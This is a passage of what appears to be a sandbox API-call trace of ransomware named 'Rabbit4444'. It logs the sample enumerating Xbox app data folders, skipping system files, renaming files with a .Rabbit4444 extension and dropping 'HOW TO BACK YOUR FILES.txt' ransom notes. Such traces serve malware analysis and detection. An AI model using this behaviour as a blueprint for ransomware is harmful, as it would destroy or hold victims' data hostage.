lpString2=".dll") returned 1 [0062.579] lstrlenW (lpString=".lnk") returned 4 [0062.579] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0062.579] lstrlenW (lpString=".ini") returned 4 [0062.579] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0062.579] lstrlenW (lpString=".sys") returned 4 [0062.579] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0062.579] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15aca2b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xa9d8782f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x27035a40, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0062.579] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0062.579] lstrcpyW (in: lpString1=0x130ebd8, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0062.579] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0062.580] lstrlenW (lpString="settings.dat") returned 12 [0062.580] lstrlenW (lpString="Rabbit4444") returned 10 [0062.580] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0062.580] lstrlenW (lpString=".dll") returned 4 [0062.580] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0062.580] lstrlenW (lpString=".lnk") returned 4 [0062.580] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0062.580] lstrlenW (lpString=".ini") returned 4 [0062.580] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0062.580] lstrlenW (lpString=".sys") returned 4 [0062.580] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0062.580] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0062.581] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.581] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15389154084) returned 1 [0062.581] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0062.581] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0062.581] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0062.582] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11e2c0 [0062.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0062.584] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0062.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0062.584] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x125460 [0062.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0062.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125460 | out: hHeap=0xe0000) returned 1 [0062.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0062.585] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15389538091) returned 1 [0062.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0062.585] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0062.585] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.585] CloseHandle (hObject=0x2a0) returned 1 [0062.585] CloseHandle (hObject=0x260) returned 1 [0062.585] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444") returned 103 [0062.585] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0062.586] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x133ef956, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x133ef956, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x133ef956, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0062.586] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0062.586] lstrcpyW (in: lpString1=0x130ebd8, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0062.586] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0062.587] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0062.587] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0062.587] lstrlenW (lpString="Rabbit4444") returned 10 [0062.587] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0062.587] lstrlenW (lpString=".dll") returned 4 [0062.587] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0062.587] lstrlenW (lpString=".lnk") returned 4 [0062.587] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0062.587] lstrlenW (lpString=".ini") returned 4 [0062.587] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0062.587] lstrlenW (lpString=".sys") returned 4 [0062.587] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0062.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0062.588] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.588] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15389846954) returned 1 [0062.588] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0062.588] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0062.588] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x2a0 [0062.589] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x125460 [0062.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0062.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125460 | out: hHeap=0xe0000) returned 1 [0062.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0062.590] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x125460 [0062.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0062.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x125460 | out: hHeap=0xe0000) returned 1 [0062.590] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0062.591] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15390127827) returned 1 [0062.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0062.591] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0062.591] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.591] CloseHandle (hObject=0x2a0) returned 1 [0062.591] CloseHandle (hObject=0x260) returned 1 [0062.591] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444") returned 108 [0062.591] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0062.592] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x133ef956, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x133ef956, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x133ef956, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0062.592] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0062.592] lstrcpyW (in: lpString1=0x130ebd8, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0062.592] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0062.592] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0062.592] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0062.592] lstrlenW (lpString="Rabbit4444") returned 10 [0062.592] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0062.592] lstrlenW (lpString=".dll") returned 4 [0062.592] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0062.593] lstrlenW (lpString=".lnk") returned 4 [0062.593] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0062.593] lstrlenW (lpString=".ini") returned 4 [0062.593] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0062.593] lstrlenW (lpString=".sys") returned 4 [0062.593] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0062.593] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x133ef956, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x133ef956, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x133ef956, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0062.593] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0062.593] lstrcpyW (in: lpString1=0x130ebd8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.593] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.593] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0062.593] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.597] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.597] CloseHandle (hObject=0x260) returned 1 [0062.597] CloseHandle (hObject=0x27c) returned 1 [0062.597] GetCurrentThreadId () returned 0xd98 [0062.597] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0062.597] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState" [0062.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118de8 | out: hHeap=0xe0000) returned 1 [0062.597] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0062.597] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState" [0062.597] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\" [0062.597] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" [0062.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.601] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.603] FlushFileBuffers (hFile=0x298) returned 1 [0062.604] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.604] CloseHandle (hObject=0x298) returned 1 [0062.605] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState") returned 83 [0062.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.605] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2087373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.605] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.605] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.605] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.605] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15867c3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2087373, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.605] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.605] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.605] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.605] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.605] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.606] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea37924, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea37924, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.606] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.606] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.606] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea37924, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea37924, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeea37924, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.606] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.606] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.607] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0062.607] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.607] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.607] CloseHandle (hObject=0x260) returned 1 [0062.607] CloseHandle (hObject=0x298) returned 1 [0062.607] GetCurrentThreadId () returned 0xd98 [0062.607] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0062.607] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState" [0062.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x119208 | out: hHeap=0xe0000) returned 1 [0062.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0062.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState" [0062.607] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\LocalState\\") 